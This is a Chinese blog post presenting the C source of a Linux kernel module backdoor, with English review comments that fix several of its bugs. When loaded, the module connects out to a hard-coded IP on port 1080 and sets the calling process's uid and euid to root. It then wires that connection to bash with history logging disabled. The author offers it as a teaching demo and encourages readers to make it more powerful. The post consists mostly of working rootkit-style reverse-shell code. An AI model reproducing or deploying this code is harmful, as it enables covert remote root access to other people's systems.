
一个简单的内核后门原型


http://www.gipsky.com/
作者:wzt <wzt#xsec.org>



这是一个在内核模块中实现的反连后门，大家看看这与应用层上的实现有什么不同吧，呵呵。（注意：代码直接改写 task_struct 的 uid/gid 字段并使用 set_fs(KERNEL_DS)，这应该只适用于没有 cred 结构的旧版 2.6 内核；在较新的内核上需要改用 cred API。）

/*

* Kernel mode connect backdoor,haha~

*

* just a demo module to teach you how to write a backdoor in kernel mode,

* i believe you can add more code to make it stronger and more powerful, wulala.

*

* by wzt <wzt#xsec.org>

*

*/



#include <linux/module.h>

#include <linux/kernel.h>

#include <linux/socket.h>

#include <linux/net.h>

#include <linux/in.h>

#include <linux/fs.h>

#include <linux/file.h>

#include <linux/types.h>

#include <linux/errno.h>

#include <linux/string.h>

#include <linux/unistd.h>

#include <net/sock.h>

#include <asm/uaccess.h>

#include <asm/unistd.h>

#include "syscalls.h"



/* Reverse-connect target. k_connect() dials out from kernel context to
 * REMOTO_IP:port; both are hard-coded for this demo.
 * NOTE(review): `port` is a lowercase macro name and will silently rewrite
 * any later identifier spelled `port`; an UPPER_CASE name (e.g. REMOTE_PORT)
 * would be safer, but callers in this file still use `port`. */
#define REMOTO_IP "192.168.75.1"

#define port 1080



/* Module metadata. Declaring the module GPL is what lets it link against
 * GPL-only exports, and also avoids the kernel's "tainted" warning on load —
 * a small detail defenders may want to note when reviewing such modules. */
MODULE_LICENSE("GPL");

MODULE_AUTHOR("wzt");



/* dup2(2) wrapper generated by the my_syscall2() macro from "syscalls.h"
 * (not shown on this page). The module issues raw syscalls on behalf of
 * the current task — presumably the insmod process — since there is no
 * libc in kernel context. The return type is left implicit (int); an
 * execve() wrapper is used below as well and is expected from the same
 * header. */
static inline my_syscall2(int, dup2, int, oldfd, int, newfd);



/*
 * argv for the spawned shell: bash with the flags that skip the profile
 * and rc files, so nothing from the target's dotfiles runs at start-up.
 * The trailing NULL is the terminator execve() requires.
 */
static char *earg[4] = {
	"/bin/bash",
	"--noprofile",
	"--norc",
	NULL
};



/*
 * Environment handed to the spawned shell. HOME is a macro this file does
 * not define — it is expected from "syscalls.h". HISTFILE=/dev/null keeps
 * bash from writing a history file for the session. NULL-terminated as
 * execve() requires.
 */
char *env[] = {
	"TERM=linux",
	"HOME=" HOME,
	"PATH=/bin:/usr/bin:/sbin:/usr/sbin:/usr/local/bin:/usr/local/sbin",
	"HISTFILE=/dev/null",
	NULL
};



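/*
 * Open a TCP connection from kernel context to REMOTO_IP:port, map the
 * socket to an fd of the current task, make that task root, point its
 * stdin/stdout/stderr at the socket and exec a shell over it.
 *
 * Runs in the context of whatever task is executing the module init
 * (presumably the insmod process). On success execve() replaces that task
 * with the shell, so this function does not return.
 *
 * Returns -1 when the socket cannot be created, mapped or connected, and
 * 1 only if execve() itself returned, i.e. the exec failed.
 *
 * NOTE(review): this targets an old kernel ABI — it writes uid/gid fields
 * directly on task_struct and relies on set_fs(KERNEL_DS). The original left
 * the address limit at KERNEL_DS on every failure path, which would let the
 * unprivileged calling process pass kernel addresses to later syscalls; the
 * previous limit is restored here.
 */
int k_connect(void)
{
	struct task_struct *tsk = current;
	struct socket *sock = NULL;
	struct sockaddr_in server;
	mm_segment_t old_fs;
	int sockfd;
	int error;

	/* Kernel buffers are handed to syscall-level helpers below, so the
	 * address-limit check must accept kernel pointers. Remember the old
	 * limit so the error paths can put it back. */
	old_fs = get_fs();
	set_fs(KERNEL_DS);

	error = sock_create(AF_INET, SOCK_STREAM, 0, &sock);
	if (error < 0) {
		printk("[-] socket_create failed: %d\n", error);
		/* `sock` is not valid after a failed sock_create(); the original
		 * called sock_release() on it here, dereferencing an unset pointer. */
		goto fail;
	}

	sockfd = sock_map_fd(sock);
	if (sockfd < 0) {
		printk("[-] sock_map_fd() failed.\n");
		/* Kept from the original: on the kernels this targets the caller
		 * still owns the socket after a failed mapping. */
		sock_release(sock);
		goto fail;
	}

	/* Zero the whole address (covers sin_zero) instead of the original
	 * per-byte loop, whose increment was missing ("i " instead of "i++"). */
	memset(&server, 0, sizeof(server));
	server.sin_family = AF_INET;
	server.sin_addr.s_addr = in_aton(REMOTO_IP);
	server.sin_port = htons(port);

	error = sock->ops->connect(sock, (struct sockaddr *)&server,
				   sizeof(server), sock->file->f_flags);
	if (error < 0) {
		printk("[-] connect to %s failed: %d\n", REMOTO_IP, error);
		/* NOTE(review): sockfd stays open in the calling task on this path;
		 * closing it needs a close() syscall wrapper, which this file does
		 * not declare. Do not sock_release() here — the fd owns the socket. */
		goto fail;
	}

	printk("[ ] connect to %s ok.\n", REMOTO_IP);

	/* Privilege escalation for the calling task (pre-cred task_struct
	 * layout). The gid value 0x11111111 is kept from the original; it looks
	 * like a deliberate marker rather than a real group — confirm before
	 * changing it. */
	tsk->uid = 0;
	tsk->euid = 0;
	tsk->gid = 0x11111111;
	tsk->egid = 0;

	/* Wire the shell's standard streams to the socket; the original ignored
	 * these results and would have exec'd a shell with dangling streams. */
	if (dup2(sockfd, 0) < 0 || dup2(sockfd, 1) < 0 || dup2(sockfd, 2) < 0) {
		printk("[-] dup2 failed.\n");
		goto fail;
	}

	/* Does not return on success: the calling task becomes the shell. */
	execve(earg[0], (const char **)earg, (const char **)env);

	/* Only reached if execve() failed. */
	set_fs(old_fs);
	return 1;

fail:
	set_fs(old_fs);
	return -1;
}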



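/*
 * Module entry point: starts the reverse connection as soon as the module
 * is loaded.
 *
 * The original had no return statement in a non-void function — undefined
 * behaviour, and module_init() does read the value. This returns 0 so the
 * module stays loaded even when the connect failed; k_connect() already
 * logs why. On success k_connect() does not return at all, because the
 * loading task has been replaced by the shell.
 */
int k_socket_init(void)
{
	printk("[ ] kernel socket test start.\n");

	if (k_connect() < 0)
		printk("[-] k_connect() failed.\n");

	return 0;
}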



/*
 * Module exit hook. Nothing is torn down here: the socket fd, when one was
 * created, lives in the task that ran k_connect(), not in the module. Only
 * logs the unload.
 */
void k_socket_exit(void)
{
	printk("[ ] kernel socket test over.\n");
}



/* Register the load/unload hooks. The reverse shell is triggered by the
 * load itself (k_socket_init -> k_connect); the exit hook only logs. */
module_init(k_socket_init);

module_exit(k_socket_exit);